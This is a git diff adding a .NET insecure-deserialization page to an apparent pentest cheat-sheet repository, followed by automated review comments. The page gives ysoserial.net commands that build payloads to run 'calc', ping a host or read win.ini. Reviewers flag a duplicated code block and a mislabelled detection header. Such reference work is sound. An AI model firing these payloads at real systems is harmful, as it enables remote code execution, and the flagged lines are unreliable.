diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md new file mode 100644 index 0000000..976a9f4 --- /dev/null +++ b/Insecure Deserialization/DotNET.md 
@@ -0,0 +1,48 @@ +# .NET Serialization + +## Summary + +* [Detection](#detection) +* [Exploit](#exploit) +* [References](#references) + + +## Detection + +* `AAEAAD` (Hex) = .NET deserialization BinaryFormatter +* `FF01` (Hex) / `/w` (Base64) = .NET ViewState + +Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=` + + +## Exploit + +* [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net) +```ps1 +$ cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s +$ ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini +$ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t +$ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t +``` + +### JSON.NET + +```ps1 +./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t +``` + +### BinaryFormatter + +> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they’re processing to be trustworthy. BinaryFormatter is insecure and can’t be made secure. + + +```ps1 +./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t +``` + + +## References + +* [Attacking .NET deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q) +* [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - ALYSSA RAHMANDEC](https://www.mandiant.com/resources/blog/hunting-deserialization-exploits) +* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) \ No newline at end of file diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index a62322f..23b8391 100644 --- a/Insecure Deserialization/README.md 
+++ b/Insecure Deserialization/README.md @@ -9,6 +9,15 @@ Check the following sub-sections, located in other files : * [Ruby : universal rce gadget, ...](Ruby.md) * [Python : pickle, ...](Python.md) * [YAML : PyYAML, ...](YAML.md) +* [.NET : ysoserial.net, ...](DotNET.md) + +| Object Type | Header (Hex) | Header (Base64) | +|-----------------|--------------|-----------------| +| Java Serialized | AC ED | rO | +| .NET ViewState | FF 01 | /w | +| Python Pickle | 80 04 95 | gASV | +| PHP Serialized | 4F 3A | Tz | + ## LABS @@ -16,8 +25,8 @@ Check the following sub-sections, located in other files : ## References -* [Github - ysoserial](https://github.com/frohoff/ysoserial) -* [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net) +* [Github - frohoff/ysoserial](https://github.com/frohoff/ysoserial) +* [Github - pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net) * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) 
@@ -33,4 +42,5 @@ Check the following sub-sections, located in other files : * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals * [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) * [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh -* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) \ No newline at end of file +* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) +* [Exploiting insecure deserialization vulnerabilities - PortSwigger](https://portswigger.net/web-security/deserialization/exploiting) \ No newline at end of file diff --git a/_LEARNING_AND_SOCIALS/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md index 853f44c..0584635 100644 --- a/_LEARNING_AND_SOCIALS/YOUTUBE.md +++ b/_LEARNING_AND_SOCIALS/YOUTUBE.md @@ -19,6 +19,14 @@ - [stacksmashing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw) - [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ) +- [HACKING GOOGLE Series](https://www.youtube.com/watch?v=aOGFY1R4QQ4) + - [EP000: Operation Aurora | HACKING GOOGLE](https://youtu.be/przDcQe6n5o) + - [EP001: Threat Analysis Group | HACKING GOOGLE](https://youtu.be/N7N4EC20-cM) + - [EP002: Detection and Response | HACKING GOOGLE](https://youtu.be/QZ0cpBocl3c) + - [EP003: Red Team | HACKING GOOGLE](https://youtu.be/TusQWn2TQxQ) + - [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg) + - [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU) + ## Conferences - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
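Review bot: in the new `Insecure Deserialization/DotNET.md`, the code block under `### BinaryFormatter` is a verbatim copy of the JSON.NET block (`-f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t`), so the section heading and its example disagree; the formatter in that block should be `BinaryFormatter`, as the `-f BinaryFormatter -g PSObject` line in the summary block already is, or the duplicate block should be dropped. In the Detection list, `AAEAAD` is labelled "(Hex)" but it is a (mistyped) Base64 prefix: the BinaryFormatter SerializationHeaderRecord begins with the bytes `00 01 00 00 00 FF FF FF FF`, which encode to `AAEAAAD/////`, exactly the prefix of the example given two lines later; the entry should read `0001000000FFFFFFFF` (Hex) / `AAEAAAD/////` (Base64) so it matches the `FF01` / `/w` ViewState entry and the example. Minor style points: the `ps1` fence mixes `$` prompts, `cat file | ysoserial.exe` and `./ysoserial.exe` forms, which breaks copy-paste and does not match a PowerShell fence; the references carry a French date abbreviation ("28 avr. 2018") and a fused author/date ("ALYSSA RAHMANDEC", presumably Alyssa Rahman, Dec.); and the new file ends without a trailing newline.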
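Review bot: the header table added to `Insecure Deserialization/README.md` (hunk `@@ -9,6 +9,15 @@`) has two rows whose labels are broader than the bytes they give. `4F 3A` / `Tz` is `O:`, which only matches a serialized PHP object; serialized arrays and scalars start with `a:`, `s:`, `i:` etc., so the row should be labelled "PHP Serialized object" or list the other type prefixes. `80 04 95` / `gASV` is the protocol-4 pickle preamble (PROTO 4 followed by FRAME); protocol 2 and 3 pickles start with `80 02` / `80 03` and carry no `95` frame opcode, so the row should state the protocol or give `80` plus the version byte. A row for .NET BinaryFormatter (`00 01 00 00 00 FF FF FF FF`, Base64 `AAEAAAD/////`) would also keep the table consistent with the Detection section of the new `DotNET.md`, which is the only place that header currently appears.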
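Review bot: in the last `README.md` hunk (`@@ -33,4 +42,5 @@`) the edited file still ends with "\ No newline at end of file"; since the line is being touched anyway, the new PortSwigger reference should be terminated with a newline so the next append to the list does not produce another whole-line diff.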